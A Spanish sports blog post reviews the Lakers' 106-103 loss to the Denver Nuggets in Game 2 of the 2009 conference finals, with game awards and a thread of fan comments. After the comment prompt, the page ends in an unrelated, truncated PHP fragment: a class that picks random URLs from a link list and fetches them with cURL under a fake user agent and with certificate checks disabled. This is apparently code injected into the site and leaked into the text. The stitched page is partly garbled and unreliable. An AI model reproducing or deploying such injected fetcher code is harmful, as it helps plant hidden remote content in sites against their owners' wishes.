Playoffs (21/05/2009): Nadie dijo que fuese fácil

22 de May de 2009 por MagicJohnson32

nuggetswin“Nobody said it was easy”, reza la canción. Y ése es uno de los mensajes que los Lakers pueden extraer de su derrota, anoche, ante los Denver Nuggets 106-103 en el segundo partido de las finales de Conferencia. La eliminatoria viajará a Colorado con 1-1 para la disputa del tercer y cuarto partido (sábado a las 2.30 y lunes a las 3.00 respectivamente, horario español peninsular), con el factor cancha del lado ahora de los Nuggets. Y puede que también haya que atribuirles el favoritismo.

El partido de anoche se pareció al primero de la serie, salvo que el orden de los factores fue el inverso. Salieron mucho mejor los Lakers, con un plan de juego muy claro especialmente por lo que respectaba a la defensa sobre Melo y Billups. Los de Phil Jackson descuidaban la marca de Kenyon, que lo aprovechó con varias canastas fáciles, a cambio de secar la producción de Anthony. Así, con 14 puntos de Bryant, los Lakers cerraron el cuarto inicial 8 arriba, 23-31, una ventaja que se amplió hasta el 27-41 en el inicio del segundo período.

Hasta aquí llegó el dominio de los Lakers. Sin Bryant ni Ariza en pista durante casi 7 minutos, Carmelo Anthony despertó. Jackson, una vez que plan inicial caducó, tardó demasiado en reaccionar y para cuando lo hizo, ya fue demasiado tarde. Melo enlazó 14 puntos consecutivos y, ayudado por los triples de Kleiza, levantó de la lona a su equipo, que redujo a un solo punto la diferencia al descanso.jump

Los Lakers no se hundieron, pero cada intento de romper el partido se veía frustrado por el acierto de Anthony o la sabiduría de Billups. Así que ambos equipos caminaron en paralelo durante el resto del partido, con apenas un momento crítico para los Lakers (91-84) neutralizado por los triples de Kobe y Brown. El final fue, como ya ocurriera el pasado martes, un cara o cruz que esta vez favoreció a los Nuggets tras una canasta de Kenyon Martin y la posterior jugada a 0:18 para la conclusión en la que Bryant perdió el control de balón tras tocarlo Nene con el pie y, en el salto entre dos posterior, Ariza acabó perdiendo la posesión. Lakers aún dispuso de una oportunidad para forzar la prórroga pero el tiro de Fisher, absolutamente negado toda la noche, no tocó aro.

Los Lakers sabían que no iba a ser fácil superar a los Nuggets. Pero posiblemente no pensaban que fuese a resultar tan duro.

PREMIOS

MVP: La idea inicial de los Lakers era frenar a Carmelo y Billups y durante el primer tramo de partido parecía funcionar. paukobelossLamentablemente para ellos no pudieron mantener la tensión defensiva y los 2 jugadores de los Nuggets se fueron a los 32 y 27 puntos respectivamente.

Sorpresa: Buen papel de dos secundarios de los Nuggets. 16 puntos tanto para Kenyon Martin como para Linus Linas Kleiza, el primero con canasta decisiva en los segundos finales.

Decepción: El mejor sexto hombre de la NBA sigue desaparecido en combate. Tras ganar la partida a Jason Terry en la anterior eliminatoria, JR Smith no encuentra su sitio frente a Kobe y compañía. 3 tristes puntos para él.

Esfuerzo en vano: Destacando en ambos lado de la pista, Trevor Ariza secó a Carmelo Anthony en la primera fase del encuentro, aportó 20 puntos (6 de 7 en tiros) y 4 robos, y nos dejó las dos jugadas más espectaculares del partido con un sensacional mate sobre Dahntay Jones y un gran 2+1 ante Nenê.

RAZONES

2.30 h (hora española). Unos Cavs enrabietados por su primera derrota en Playoffs reciben a unos Magic que pueden considerar que ya han hecho su trabajo en el Quicken Loans Arena. La victoria de Cleveland parece clara pero, como reza el título del post, “Nadie dijo que fuese fácil”. Hay que jugarlo.

Comenta

13 comentarios a esta entrada

  1. Kantonyo dice:
    #1

    No vi ayer el partido, pero me sorprende el titular de ESPN, “Nene’s up, Pau Gasol is down”, veo las estadisticas y veo que Gasol 17 puntos y 17 rebotes y Nene 6 puntos y 9 rebotes. A ver si alguien me lo puede explicar …

      Citar

  2. TheDeerHunter dice:
    #2

    A priori ya me hubiera extrañado salir de L.A. con un 2-0 a favor, como también me extrañaría que volvieramos con un 3-1. La eliminatoria acaba de empezar…

    Es curioso que el otro día me preguntaba porqué apenas se había utilizado a Kleiza en estos playoffs, y reflexionaba sobre nuestro 3 suplente, Walton, que está bastante mal… por lo visto Karl también se ha percatado del asunto.

    Creo que los Lakers no tienen claro los sistemas de ataque. Se ven tan sobrados que los ignoran, que se los saltan. Pau no está jugando bien pero ordena el juego como nadie en ese equipo. Fue decisivo en el 7º contra Houston y lo será en esta eliminatoria si Lakers rebaja ligeramente el juego a su ritmo. No me parece demasiado buena idea jugar posesiones cortas contra Denver. Es el intercambio de golpes que de momento ha permitido el 1-1 (que bien podría haber sido el 2-0 o el 0-2) Jugar una lotería que L.A debería evitar, porque a priori son superiores.

    Los termómetros de esta eliminatoria Fisher y Bynum. Con ellos tan mal será difícil que pasemos.
    ¿Seguro que Phil Jackson no tiene alternativas?? Sigo estando muy preocupado por las señales desde el cuerpo técnico… pero ya se sabe. Él jamás ha perdido ganando el primer partido de una serie. Los caminos del señor son inexcrutables (me refiero a Jackson, claro)

      Citar

  3. TheDeerHunter dice:
    #3

    @Kanonyo: Creo que se refiere a la foto, y diría que es una metáfora representando a los respectivos equipos.
    En cualquier caso estoy contigo, me parece desacertadísimo y tendencioso el titular.

    No sé porqué se está ignorando tanto la responsabilidad de Bynum. Debería estar llevándose todos los palos del mundo. Será la costumbre…

    Aprovecho para decir que me parece indignante que hasta 5 jugadores (incluído Fisher) se jueguen más tiros que él. No sé de quien será la culpa.

      Citar

  4. Viva_Dirk dice:
    #4

    Por mi pueden irse a la mierda. El único laker que esta mereciendo ganar la serie es Ariza, el resto nada. Kobe me tiene hasta los mismísimos con sus cabreos momentaneos que normalmente desembocan en un rebote ofensivo de su par o un ataque mal hecho. Pau no se que mas quiere, que deje de doblar balones a don nadies y se juegue el los balones.

      Citar

  5. arivas dice:
    #5

    Me parece que ese exceso de confianza que hablais que tiene el equipo, lo teneis también los aficionados amarillos.
    Magic titula que “nadie dijo que fuera fácil” pero me da que en el fondo si lo penasban/pensabais.

      Citar

  6. TheDeerHunter dice:
    #6

    la verdad, no sé qué te hace pensar eso Arivas… supongo que no me debo de sentir aludido y en cualquier caso no será por mis comentarios al respecto.

    Lo único que sí reconozco es que, quitando a los Celtics, la plantilla de los Lakers debería ser en teoría la favorita a ganar todo. Pero viendo jugar a los Fisher, Bynum, Walton, Vujacic… etc o dirigir a Jackson la teoría se va a la mierda.
    Le tengo el máximo respeto a los Nuggets como rival. Me dan un miedo que te cagas. Y antes me lo dieron Utah y Houston. Creo que los que me conocen saben que no soy sospechoso de exceso de confianza nunca.

      Citar

  7. arivas dice:
    #7

    Es cierto que no es tu caso Deer, que siempre has mostrado cierto temor y supongo que hay otros muchos que también lo ven así. Es una senación general que yo tengo (puede que esté equivocado).

      Citar

  8. TheDeerHunter dice:
    #8

    Yo también creo que Pau está pecando en exceso de soltar la bola pero, varios apuntes:
    -Cuando hace eso tan marcadamente suele ser que no puede ni con el culo.
    -Que apenas puede lanzar a canasta porque no disfruta de tiros abiertos.
    -La causa de los dos puntos anteriores también puede ser que Bynum/Odom no están haciendo bien su trabajo, pero es que tampoco sus compañeros le suelen ver demasiado en ventaja. De todo esto no sólo Gasol tiene la culpa.
    -Cuando Shaq vestía de amarillo también solía doblar el primer pase. El caso es que luego se la devolvían. A ver si esto pasa con Gasol.

    El ritmo de tiro no beneficia. El ataque es un caos. En el último partido contra Houston se vió el camino. Si quieren pueden (no digo ya ganar, digo organizar el ataque con criterio)

      Citar

  9. xapa_croack dice:
    #9

    Al igual k la serie va 1-1, podria ir perfectamente 0-2 pq la cagada espectacular de billups en el 1o es imperdonable, si deer tu eres el mas contenido de los amarillos k normalmente escribe por aqui, cuando ganan piensan que kobe es el mejor y si pierden que el banquillo es el peor de todos los equipos en poffs.

    Ayer hubo partido igualado pq ariza saco su casta y trabajo mucho.
    Y menos mal que Melo hacia malos partidos contra los amarillos.

    Por cierto vaya 3 partidazos de emocion en estas finales de conferencia, que siga la fiesta¡¡¡¡¡¡

      Citar

  10. Txusma dice:
    #10

    Hombre yo creo q tanto podrian ir 0-2 como 2-0, pq ayer en los segundos finales tb hubieron cagadas de los Lakers y alguna decisión arbitral discutible. Podría haber caido tanto de un lado como del otro. Igualdad máxima!

      Citar

  11. xapa_croack dice:
    #11

    por cierto no es linas kleiza…

      Citar

  12. PIRATA dice:
    #12

    Es normal que nos fijemos y mucho en el juego que desarrolla Pau, y siempre esperamos más de él. Para mi esta haciendo unos PO mucho más buenos que los del año pasado; si os sirve de consuelo en los blogs y foros de Los Angeles estan cargando las tintas en Derek Fisher (lo machacan a saco) en los pocos minutos de Bynum y sobre todo en la mala visión del 2 partido por parte de Phil Jackson, de Pau no se comenta casi nada.

      Citar

  13. TheDeerHunter dice:
    #13

    Bueno, en realidad alguien sí dijo que iba a ser fácil (o al menos lo insinuó): Viva… XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>